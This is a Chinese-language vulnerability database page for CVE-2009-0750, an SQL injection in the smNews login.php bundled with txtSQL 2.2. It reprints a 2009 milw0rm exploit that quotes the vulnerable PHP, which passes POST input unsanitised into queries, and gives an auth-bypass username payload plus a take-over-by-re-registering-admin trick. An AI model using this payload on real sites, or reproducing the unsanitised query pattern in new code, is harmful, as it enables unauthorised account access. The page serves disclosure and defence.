Tombstone txtSQL smNews example script 'login.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117408 漏洞类型 SQL注入
发布时间 2009-02-18 更新时间 2009-03-02
CVE编号 CVE-2009-0750 CNNVD-ID CNNVD-200903-049
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8076
https://www.securityfocus.com/bid/80641
https://cxsecurity.com/issue/WLB-2009030107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-049
|漏洞详情
txtSQL是一个包含了只使用普通的文本文件模拟一个数据库系统各种功能的系统。txtSQL2.2终极版的smNewsexamplescript的login.php中存在SQL注入漏洞。远程攻击者可以借助用户名参数,执行任意SQL指令。
|漏洞EXP
#########################################################################################
[0x01] Informations:
Name           : smNews
Download       : http://downloads.sourceforge.net/simplequizz/simpleQuizz.zip?modtime=1229788692&big_mirror=0
Vulnerability  : Auth Bypass/Column Truncation
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian //
Greetz         : Str0ke,
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/smNews/login.php [...] register.php
[code]
  $results = execute('select',
        array('table' => 'users',
       'where' => array('username =~ ^'.$_POST['username'].'$', 'and', 'password = '.md5($_POST['password'])),
       'limit' => array(0,0)));
[/code]

[code]
  execute('insert',
    array('table' => 'users',
          'values' => array('username' => $_POST['username'],
                            'password' => md5($_POST['password']),
                            'email'    => $_POST['email'])));
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: 1- Username: admin ' or '
            Password: x0r
      2- You have only to re-reg the admin.. ex: (if admin nick is 'lol' you reg an
      account with your passwd, email and nick 'lol' ^^ easy :P
########################################################################################

EOF

# milw0rm.com [2009-02-18]
|受影响的产品
Tombstone Smnews -
|参考资料

来源:XF
名称:smnews-login-sql-injection(48813)
链接:http://xforce.iss.net/xforce/xfdb/48813
来源:MILW0RM
名称:8076
链接:http://www.milw0rm.com/exploits/8076